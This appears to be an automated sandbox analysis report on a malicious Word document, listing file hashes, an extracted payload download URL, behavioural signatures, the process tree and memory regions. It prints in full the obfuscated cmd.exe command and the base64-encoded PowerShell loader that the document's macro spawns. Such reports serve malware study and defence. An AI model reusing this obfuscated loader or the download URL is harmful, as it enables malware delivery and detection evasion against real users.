Analysis
-
max time kernel
109s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
09-05-2021 11:42
Behavioral task
behavioral1
Sample
initial.bin.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
initial.bin.doc
Resource
win10v20210408
General
-
Target
initial.bin.doc
-
Size
106KB
-
MD5
7a618482be272bb1fcb4af69a3f649a3
-
SHA1
8d77bac6b9f0f45dbddce469dbb24a9c6be0ac46
-
SHA256
8e0ddb5abdb6a6b5196e3a4182f3becccfc302c013dce60836896d79f2d7da2a
-
SHA512
3e8e54be84e5406ab22064bd69e0deba21d7fb7ec625c88b91659f38f8db9f6f2dc5d84da3004b7c41e3771074b1d7a70130f4e0c2a869140619c2f83434993d
Malware Config
Extracted
http://finance-advisors-ca.bid/ldr.bin
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3616 808 Cmd.exe WINWORD.EXE -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 3616 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 808 WINWORD.EXE 808 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 512 powershell.exe 512 powershell.exe 512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 512 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 808 WINWORD.EXE 808 WINWORD.EXE 808 WINWORD.EXE 808 WINWORD.EXE 808 WINWORD.EXE 808 WINWORD.EXE 808 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 808 wrote to memory of 3616 808 WINWORD.EXE Cmd.exe PID 808 wrote to memory of 3616 808 WINWORD.EXE Cmd.exe PID 3616 wrote to memory of 512 3616 Cmd.exe powershell.exe PID 3616 wrote to memory of 512 3616 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\initial.bin.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd TACAiZWidzJ QlELiFOErRhvNKiaJWsYwW wlJfOqlYPlHp & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AwpZiQoBRUEQPsH%=cRwTOVNzvj&&set %YrMvOFQhX%=p&&set %CTWbrSlIwsfzwt%=o^w&&set %pAjKSKGUdiTzNII%=RdjtQWiQvz&&set %bCbazDZpqJqEP%=!%YrMvOFQhX%!&&set %nobijsdvaoVGBuK%=OdAfEqLtEjRCTT&&set %wauWYPWLOzP%=e^r&&set %rbXUXQCsTtYNK%=!%CTWbrSlIwsfzwt%!&&set %iTXpEXwqEHkkj%=s&&set %RPPUXRswvbTRhTz%=bmiVHFPQ&&set %zjUnavSRR%=he&&set %VKzjjIHdbbC%=ll&&!%bCbazDZpqJqEP%!!%rbXUXQCsTtYNK%!!%wauWYPWLOzP%!!%iTXpEXwqEHkkj%!!%zjUnavSRR%!!%VKzjjIHdbbC%! -e JgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABQAFMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABuAGUAVwAtAE8AYgBKAGUAYwB0ACAAIABTAHkAUwBUAEUATQAuAEkATwAuAGMAbwBNAFAAcgBlAFMAUwBJAE8ATgAuAEQAZQBGAEwAQQBUAGUAcwBUAHIAZQBBAE0AKAAgAFsASQBPAC4AbQBlAG0ATwBSAFkAUwB0AFIARQBhAG0AXQBbAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAcgBJAG4AZwAoACAAJwBWAFUAOQBkAFMAOABNAHcARgBQADAAcgBlAFEAaQBrAHgAVABWAGwAaQBpAGcATABnAGwAZwBuAGUAMQBBAFoAVgBpAGcARABRAGQATAAwAGIAbwAyADIAUwBVAG0AdgBhADcAZgBTAC8AMgA1ADAAOQBjAEcAWABlADcAbgBuAGcAMwBNAHUAWABUAGYAeQArAEUASgB1AGkASQBFAHUAcwB2AGsASABLAEMAUgBPAG0AcwBMAFcAZwByAG8ANgBrAFgAWAAyAG4AMABzAFAATABVAEwATgBuAHcARgA1AEIAbgBsAFMAYQBUAEEAbwBxAE0AcgB1AE4AcQBVAFgAcwBoAEsAeABXAGMAVAB4AFYAaAB0AHAARgBFAFMAeQAyAE8AdgBXAHUAagBaAFMAawB1AGUANgBpAEsAdgBDACsAVwAwAFkAVAA1AHQASwBZADgAQgB1AFcAUwBqAG8AbwB6AG8AdQBWADkAcQA3ADYAVwA4AFgAYgBxAEQASABZAEQANABqADUANQBmAHoAcQArAHMATABMADYAaQArADkAcgBqADUANABjAEgAcwBGAHoANgA5AEkAVwBlAEUAdgBUAEUALwAvADcAegArADUAdABBAEQARQAxAHYAcgBRAEsAbwB5AG8ASwB0AEUAbAA0AHAAbwBRADAANwBkAHcAZwBIAGQAWQBaAGcAKwA0AHYAZQAyAE0ANQBXAFYAeABZAE8AdQBZAEoATAB5AFYANQB1AGkAMAAyAFkAWABoAEQATgB5AFMAZwB4AEYAaQB0AEoAaAB0AEgAWgBXAFEAZAB0AE8AcQBNAGgAOQB3AHEAYwBZAGwAVQBSAFYARABwADMAVABDAEYARgBwAFcAeQBUADAAbgBTADkANwBCAFEAMQBxAGEALwBpAFQATgA4AGcAZABpAEgASAA4AEIAZwA9AD0AJwAgACkALAAgAFsAUwB5AHMAdABFAE0ALgBJAE8ALgBDAE8ATQBQAHIARQBzAFMAaQBPAE4ALgBjAE8ATQBQAFIARQBTAHMAaQBPAG4AbQBvAEQAZQBdADoAOgBkAEUAYwBvAG0AcABSAGUAcwBTACkAIAB8ACUAewAgAG4AZQBXAC0ATwBiAEoAZQBjAHQAIABzAHkAUwB0AGUAbQAuAGkATwAuAFMAdABSAGUAQQBtAFIARQBBAEQARQByACgAIAAkAF8AIAAsACAAWwBzAFkAcwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBvAEQAaQBOAGcAXQA6ADoAYQBTAGMASQBJACAAKQAgAH0AIAApAC4AcgBFAEEARAB0AE8ARQBOAGQAKAAgACkA2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABQAFMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABuAGUAVwAtAE8AYgBKAGUAYwB0ACAAIABTAHkAUwBUAEUATQAuAEkATwAuAGMAbwBNAFAAcgBlAFMAUwBJAE8ATgAuAEQAZQBGAEwAQQBUAGUAcwBUAHIAZQBBAE0AKAAgAFsASQBPAC4AbQBlAG0ATwBSAFkAUwB0AFIARQBhAG0AXQBbAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAcgBJAG4AZwAoACAAJwBWAFUAOQBkAFMAOABNAHcARgBQADAAcgBlAFEAaQBrAHgAVABWAGwAaQBpAGcATABnAGwAZwBuAGUAMQBBAFoAVgBpAGcARABRAGQATAAwAGIAbwAyADIAUwBVAG0AdgBhADcAZgBTAC8AMgA1ADAAOQBjAEcAWABlADcAbgBuAGcAMwBNAHUAWABUAGYAeQArAEUASgB1AGkASQBFAHUAcwB2AGsASABLAEMAUgBPAG0AcwBMAFcAZwByAG8ANgBrAFgAWAAyAG4AMABzAFAATABVAEwATgBuAHcARgA1AEIAbgBsAFMAYQBUAEEAbwBxAE0AcgB1AE4AcQBVAFgAcwBoAEsAeABXAGMAVAB4AFYAaAB0AHAARgBFAFMAeQAyAE8AdgBXAHUAagBaAFMAawB1AGUANgBpAEsAdgBDACsAVwAwAFkAVAA1AHQASwBZADgAQgB1AFcAUwBqAG8AbwB6AG8AdQBWADkAcQA3ADYAVwA4AFgAYgBxAEQASABZAEQANABqADUANQBmAHoAcQArAHMATABMADYAaQArADkAcgBqADUANABjAEgAcwBGAHoANgA5AEkAVwBlAEUAdgBUAEUALwAvADcAegArADUAdABBAEQARQAxAHYAcgBRAEsAbwB5AG8ASwB0AEUAbAA0AHAAbwBRADAANwBkAHcAZwBIAGQAWQBaAGcAKwA0AHYAZQAyAE0ANQBXAFYAeABZAE8AdQBZAEoATAB5AFYANQB1AGkAMAAyAFkAWABoAEQATgB5AFMAZwB4AEYAaQB0AEoAaAB0AEgAWgBXAFEAZAB0AE8AcQBNAGgAOQB3AHEAYwBZAGwAVQBSAFYARABwADMAVABDAEYARgBwAFcAeQBUADAAbgBTADkANwBCAFEAMQBxAGEALwBpAFQATgA4AGcAZABpAEgASAA4AEIAZwA9AD0AJwAgACkALAAgAFsAUwB5AHMAdABFAE0ALgBJAE8ALgBDAE8ATQBQAHIARQBzAFMAaQBPAE4ALgBjAE8ATQBQAFIARQBTAHMAaQBPAG4AbQBvAEQAZQBdADoAOgBkAEUAYwBvAG0AcABSAGUAcwBTACkAIAB8ACUAewAgAG4AZQBXAC0ATwBiAEoAZQBjAHQAIABzAHkAUwB0AGUAbQAuAGkATwAuAFMAdABSAGUAQQBtAFIARQBBAEQARQByACgAIAAkAF8AIAAsACAAWwBzAFkAcwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBvAEQAaQBOAGcAXQA6ADoAYQBTAGMASQBJACAAKQAgAH0AIAApAC4AcgBFAEEARAB0AE8ARQBOAGQAKAAgACkA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/512-180-0x0000000000000000-mapping.dmp
-
memory/512-183-0x00000143EDBE6000-0x00000143EDBE8000-memory.dmpFilesize
8KB
-
memory/512-182-0x00000143EDBE3000-0x00000143EDBE5000-memory.dmpFilesize
8KB
-
memory/512-181-0x00000143EDBE0000-0x00000143EDBE2000-memory.dmpFilesize
8KB
-
memory/808-117-0x00007FFA59300000-0x00007FFA59310000-memory.dmpFilesize
64KB
-
memory/808-118-0x00007FFA7A780000-0x00007FFA7D2A3000-memory.dmpFilesize
43.1MB
-
memory/808-122-0x00007FFA74700000-0x00007FFA757EE000-memory.dmpFilesize
16.9MB
-
memory/808-123-0x00007FFA72800000-0x00007FFA746F5000-memory.dmpFilesize
31.0MB
-
memory/808-119-0x00007FFA59300000-0x00007FFA59310000-memory.dmpFilesize
64KB
-
memory/808-114-0x00007FFA59300000-0x00007FFA59310000-memory.dmpFilesize
64KB
-
memory/808-116-0x00007FFA59300000-0x00007FFA59310000-memory.dmpFilesize
64KB
-
memory/808-115-0x00007FFA59300000-0x00007FFA59310000-memory.dmpFilesize
64KB
-
memory/3616-179-0x0000000000000000-mapping.dmp